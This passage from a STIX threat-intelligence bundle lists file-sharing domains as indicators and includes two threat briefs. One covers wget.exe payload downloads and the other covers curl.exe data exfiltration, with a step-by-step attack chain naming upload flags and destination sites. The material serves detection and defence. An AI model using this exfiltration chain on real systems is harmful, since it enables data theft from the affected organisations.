      "spec_version": "2.1",
      "id": "indicator--2b53465e-124e-5f2c-a216-eda3761ee1b4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: paste.ee",
      "pattern": "[domain-name:value = 'paste.ee']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--27f9383a-ca6d-57f2-9157-8717ffa1d4bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--2b53465e-124e-5f2c-a216-eda3761ee1b4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2b9127b1-db6d-5ab3-8d0c-7d2a3eaea0d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.com",
      "pattern": "[domain-name:value = 'pastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--84ea829c-a63a-5bb1-afb5-1d6e8069760d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--2b9127b1-db6d-5ab3-8d0c-7d2a3eaea0d8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c08f849a-fb04-5a8a-aecd-e66ab42b5831",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.pl",
      "pattern": "[domain-name:value = 'pastebin.pl']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0d14d8d-c625-52f2-a94b-8b41d14256ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--c08f849a-fb04-5a8a-aecd-e66ab42b5831"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d6b9c333-6884-521a-8a94-88e44fa63c2e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastetext.net",
      "pattern": "[domain-name:value = 'pastetext.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--61d3d8db-48db-5e3c-ae61-4789f49b92c2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--d6b9c333-6884-521a-8a94-88e44fa63c2e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--783033bb-90cf-53ac-9dd1-e5fe2db665f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pixeldrain.com",
      "pattern": "[domain-name:value = 'pixeldrain.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9641d875-dfda-5e7f-92de-0c298dc4021a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--783033bb-90cf-53ac-9dd1-e5fe2db665f4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d5cdd056-0384-5d02-a472-2d84a5cd51a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.com",
      "pattern": "[domain-name:value = 'privatlab.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f059cf09-53d9-5e6b-a1db-e078082acdc8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--d5cdd056-0384-5d02-a472-2d84a5cd51a1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a735bb0c-b9e7-5224-bb10-08ededd4316e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.net",
      "pattern": "[domain-name:value = 'privatlab.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ffd9184d-a216-5496-ac31-0d9c6194ac24",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--a735bb0c-b9e7-5224-bb10-08ededd4316e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1e6fce51-ff4b-56ce-925f-3605b349408d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: send.exploit.in",
      "pattern": "[domain-name:value = 'send.exploit.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b84afa3e-723d-566b-8d0c-c750d44df463",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--1e6fce51-ff4b-56ce-925f-3605b349408d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6268c78e-b238-56d3-ba9c-8b4fbd7fd429",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sendspace.com",
      "pattern": "[domain-name:value = 'sendspace.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9735fd70-ba7f-5707-af05-f6f76f17fc97",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--6268c78e-b238-56d3-ba9c-8b4fbd7fd429"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--db9416e2-75ba-5e93-91cb-7e8ad92d0e84",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storage.googleapis.com",
      "pattern": "[domain-name:value = 'storage.googleapis.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--af67933c-ebc3-516b-b464-cd2888fa097a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--db9416e2-75ba-5e93-91cb-7e8ad92d0e84"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ae1bf810-f35e-516e-b01a-863ff3422607",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storjshare.io",
      "pattern": "[domain-name:value = 'storjshare.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7806cd68-c3c3-5061-93f7-fcdf68c621ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--ae1bf810-f35e-516e-b01a-863ff3422607"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--490f1e5c-427d-5493-9672-73f97be7cc74",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: supabase.co",
      "pattern": "[domain-name:value = 'supabase.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebff65e1-34b9-5225-b369-caa219eb0723",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--490f1e5c-427d-5493-9672-73f97be7cc74"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--903923a6-ee1c-5f17-b850-7892e7463bb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: temp.sh",
      "pattern": "[domain-name:value = 'temp.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b10cfaa9-ef6b-5e28-9c02-340c25abc446",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--903923a6-ee1c-5f17-b850-7892e7463bb3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7aec2fd2-49bf-5bbc-9d58-bb7a7a5bf163",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: transfer.sh",
      "pattern": "[domain-name:value = 'transfer.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--290b608d-177f-5174-b6fc-7ad0b9517124",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--7aec2fd2-49bf-5bbc-9d58-bb7a7a5bf163"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--edf6e23f-ffa9-5aba-90f9-e0b195e25990",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: trycloudflare.com",
      "pattern": "[domain-name:value = 'trycloudflare.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd6ad6f9-f44f-5255-b1cd-a04459c2d2cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--edf6e23f-ffa9-5aba-90f9-e0b195e25990"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f8e10e29-1ef9-53f9-892e-bb08a864f38f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ufile.io",
      "pattern": "[domain-name:value = 'ufile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0c9a93f-f735-5d36-b797-ddcf3b2c2c3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--f8e10e29-1ef9-53f9-892e-bb08a864f38f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--34a68bb5-8262-5563-8227-7d5e0b385420",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: w3spaces.com",
      "pattern": "[domain-name:value = 'w3spaces.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--201059a4-cc86-5e92-9ef2-33a948d321df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--34a68bb5-8262-5563-8227-7d5e0b385420"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c5e9156d-f740-51d3-8353-e5c64a7e3de8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: workers.dev",
      "pattern": "[domain-name:value = 'workers.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--002e6d94-9e81-531d-8e7c-32ba8605ce57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--c5e9156d-f740-51d3-8353-e5c64a7e3de8"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--020df914-b3b7-598b-a06e-9ca8714ca623",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: x0.at",
      "pattern": "[domain-name:value = 'x0.at']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fad97818-5d3f-505b-860c-47c949a255bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--020df914-b3b7-598b-a06e-9ca8714ca623"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b05d1e5e-5265-50ab-bc80-5adf0d67af99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--78d4a70a-9b9d-56f2-a471-9f83860b4ba1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious File Download From File Sharing Domain Via Wget.EXE",
      "description": "## Overview\n\nThis threat brief focuses on the abuse of `wget.exe`, a legitimate command-line utility, by malicious actors to download suspicious files from various public file-sharing and content delivery network (CDN) domains. This technique is commonly employed during the execution phase of an attack to deliver malware, additional tools, or configuration files to compromised systems, often bypassing traditional network security controls. Prominent threat actors, including FIN7 and Mint Sandstorm (also known as Phosphorus/APT35), have been observed leveraging this method in their campaigns. For instance, FIN7 utilized such downloads in their attacks targeting Veeam servers, while Mint Sandstorm employed similar tactics in campaigns against high-profile individuals in universities and research organizations in early 2024. Detection of `wget.exe` making connections to domains like `githubusercontent.com`, `anonfiles.com`, or `mega.nz` for executable or script file types is a critical indicator of potential malicious activity.\n\n## Impact\n\nSuccessful exploitation via suspicious file downloads using `wget.exe` can lead to severe consequences. Attackers can deliver a variety of payloads, including remote access trojans (RATs), ransomware, information stealers, or custom backdoors, leading to full system compromise. This can result in unauthorized data exfiltration, disruption of operations, financial theft (as seen with FIN7), or corporate espionage (as seen with Mint Sandstorm). The long-term impact includes significant financial losses, reputational damage, and extensive recovery efforts. The scope of targeting for actors employing this technique can range from specific high-value individuals and organizations to broader campaigns.\n\n## Recommendation\n\n*   Deploy the Sigma rule `Suspicious File Download From File Sharing Domain Via Wget.EXE` to your SIEM/detection platform and tune it for your environment.\n*   Enable `process_creation` logging on all Windows endpoints to capture `wget.exe` execution details, including command-line arguments.\n*   Review network traffic logs for connections to the domains listed in the `iocs` section and consider blocking or alerting on outbound connections from sensitive systems to these domains.\n",
      "published": "2026-07-03T15:12:50Z",
      "labels": [
        "execution",
        "malware-delivery",
        "command-and-control",
        "windows"
      ],
      "object_refs": [
        "indicator--b338d256-d5c8-5474-8b9f-ec0da2ee5ce1",
        "indicator--d13114ba-a187-5b4c-92e3-89b3555c11ea",
        "indicator--26553e1e-928d-5f5c-a091-1d5826ca2b15",
        "indicator--ad1f0b49-c171-5f52-81e0-f978210e2395",
        "indicator--90f1bafc-0d17-5320-a51b-76535442d3e7",
        "indicator--7c644bf5-57aa-51a5-aeca-09a284ae13b7",
        "indicator--e5ea568a-1392-525a-bac6-9a22617ae279",
        "indicator--f606ec5d-d475-5887-ba1c-3406f9be1803",
        "indicator--4a610c22-aea9-5b6a-ac4a-9668a24439a6",
        "indicator--2c24d6a3-4591-5847-bca7-71fdfe534cd5",
        "indicator--56df840a-47a2-5267-85e4-a1285f652fe2",
        "indicator--9f2f2917-970e-562a-a168-e9ffe504a06f",
        "indicator--d3a1185a-897b-506f-87a3-3ab4ee84ae21",
        "indicator--6e3edb2c-ae5a-5a3d-a687-9da82d59eb18",
        "indicator--8dfa6c5a-2b70-54bf-b244-7f7635b4c3fb",
        "indicator--2b3b47cc-9608-5cdb-9a83-4aeb6fe08bf9",
        "indicator--2e742a9e-0e1f-5fd3-b757-888289fbeda7",
        "indicator--2b53465e-124e-5f2c-a216-eda3761ee1b4",
        "indicator--2b9127b1-db6d-5ab3-8d0c-7d2a3eaea0d8",
        "indicator--c08f849a-fb04-5a8a-aecd-e66ab42b5831",
        "indicator--d6b9c333-6884-521a-8a94-88e44fa63c2e",
        "indicator--783033bb-90cf-53ac-9dd1-e5fe2db665f4",
        "indicator--d5cdd056-0384-5d02-a472-2d84a5cd51a1",
        "indicator--a735bb0c-b9e7-5224-bb10-08ededd4316e",
        "indicator--1e6fce51-ff4b-56ce-925f-3605b349408d",
        "indicator--6268c78e-b238-56d3-ba9c-8b4fbd7fd429",
        "indicator--db9416e2-75ba-5e93-91cb-7e8ad92d0e84",
        "indicator--ae1bf810-f35e-516e-b01a-863ff3422607",
        "indicator--490f1e5c-427d-5493-9672-73f97be7cc74",
        "indicator--903923a6-ee1c-5f17-b850-7892e7463bb3",
        "indicator--7aec2fd2-49bf-5bbc-9d58-bb7a7a5bf163",
        "indicator--edf6e23f-ffa9-5aba-90f9-e0b195e25990",
        "indicator--f8e10e29-1ef9-53f9-892e-bb08a864f38f",
        "indicator--34a68bb5-8262-5563-8227-7d5e0b385420",
        "indicator--c5e9156d-f740-51d3-8353-e5c64a7e3de8",
        "indicator--020df914-b3b7-598b-a06e-9ca8714ca623",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://labs.withsecure.com/publications/fin7-target-veeam-servers"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1567",
          "url": "https://attack.mitre.org/techniques/T1567"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e491964b-9d14-528b-9604-570a828cdd0a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--59035154-0296-5d3d-9f94-6b3c348b26e9",
      "target_ref": "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--59035154-0296-5d3d-9f94-6b3c348b26e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Exfiltration via Curl to File-Sharing Websites",
      "description": "## Overview\n\nThis threat brief focuses on the post-compromise activity of data exfiltration using the legitimate `curl.exe` utility to upload files to public file-sharing websites. While `curl` is a standard utility, its use in conjunction with specific command-line arguments and known file-sharing domains (such as `wetransfer.com`, `transfer.sh`, `file.io`, and `pastebin`) is a strong indicator of malicious intent. Threat actors frequently leverage such methods to bypass traditional network defenses and move stolen data out of compromised environments. This activity is critical for defenders to detect as it signifies a successful breach that has progressed to the data exfiltration stage, potentially leading to significant data loss, intellectual property theft, and severe reputational and financial damage.\n\n## Attack Chain\n\n1.  Following initial compromise and potentially internal reconnaissance, the attacker identifies sensitive data on the Windows host.\n2.  The attacker prepares the target data for exfiltration, which may involve compression or encryption, and stages it for transfer.\n3.  The attacker executes `curl.exe` from a command prompt or script on the compromised host.\n4.  The `curl.exe` command includes specific flags such as `--form`, `--upload-file`, `--data`, `-X POST`, `-sT`, or `-d` to initiate a file upload.\n5.  The command specifies a known public file-sharing domain (e.g., `0x0.st`, `bashupload.com`, `wetransfer.com`) as the destination for the uploaded file.\n6.  `curl.exe` establishes an outbound network connection to the file-sharing service and transmits the specified sensitive data from the compromised system.\n7.  Upon successful upload, the attacker retrieves the exfiltrated data from the public file-sharing service using the provided download link, completing the data theft.\n\n## Impact\n\nThe successful exfiltration of data using this method can have severe consequences for an organization. This typically results in significant data loss, including sensitive intellectual property, customer data, or regulated personal identifiable information (PII). Such incidents can lead to substantial financial penalties due to regulatory non-compliance (e.g., GDPR, CCPA), loss of customer trust, and long-term reputational damage. Depending on the data's sensitivity, the breach could also empower competitors, disrupt business operations, or facilitate further attacks.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Curl File Upload To File Sharing Websites\" provided in this brief to your SIEM/EDR to detect suspicious `curl.exe` activity targeting public file-sharing sites.\n*   Ensure Sysmon process-creation logging is enabled on all Windows endpoints to capture command-line arguments of executed processes, which is crucial for activating the rule.\n*   Review network egress logs for connections to the domains listed in the `selection_cli_domain` of the Sigma rule to identify unapproved data transfers.\n*   Implement data loss prevention (DLP) solutions to monitor and block uploads of sensitive information to unapproved cloud storage or file-sharing services.\n",
      "published": "2026-07-03T15:11:48Z",
      "labels": [
        "data-exfiltration",
        "utility",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--465a38e0-65ed-5b24-b51b-228c2afdc195"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_curl_upload_file_sharing_websites.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f6be8911-020b-5eb5-97ae-e58b84a254e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: githubusercontent.com",
      "pattern": "[domain-name:value = 'githubusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab3a7eee-23bf-5475-a8ef-f5964ad17d9e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--f6be8911-020b-5eb5-97ae-e58b84a254e9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8b970e10-084b-5528-ac0f-66e3e9f397b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: 0x0.st",
      "pattern": "[domain-name:value = '0x0.st']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2bd77ce5-d467-5870-9af9-e46bdf7007b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--8b970e10-084b-5528-ac0f-66e3e9f397b9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f2565d65-eab6-5e66-b9b0-4d3256fb51a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anonfiles.com",
      "pattern": "[domain-name:value = 'anonfiles.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b9fbf0bb-a0c1-5e19-b9a4-62ce5582ac59",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--f2565d65-eab6-5e66-b9b0-4d3256fb51a3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--97c01e5b-14bb-5e2e-a60e-d82ba5a99577",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bashupload.com",
      "pattern": "[domain-name:value = 'bashupload.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--757fe8b6-4a10-5fcf-afee-82d2c11fe8c0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--97c01e5b-14bb-5e2e-a60e-d82ba5a99577"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8bf729ab-f8ce-5d46-a4b9-d9e604a4915d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: cdn.discordapp.com",
      "pattern": "[domain-name:value = 'cdn.discordapp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c34b4c13-fb93-5000-a644-9897cecc5b85",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--8bf729ab-f8ce-5d46-a4b9-d9e604a4915d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8a6ab030-330b-554c-9bb4-1010e628d120",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: chunk.io",
      "pattern": "[domain-name:value = 'chunk.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eb2110bb-fe54-5cc6-b916-c7e0dc59188c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--8a6ab030-330b-554c-9bb4-1010e628d120"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ca0a9df2-bb9e-5922-850d-0f246fbc1c76",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
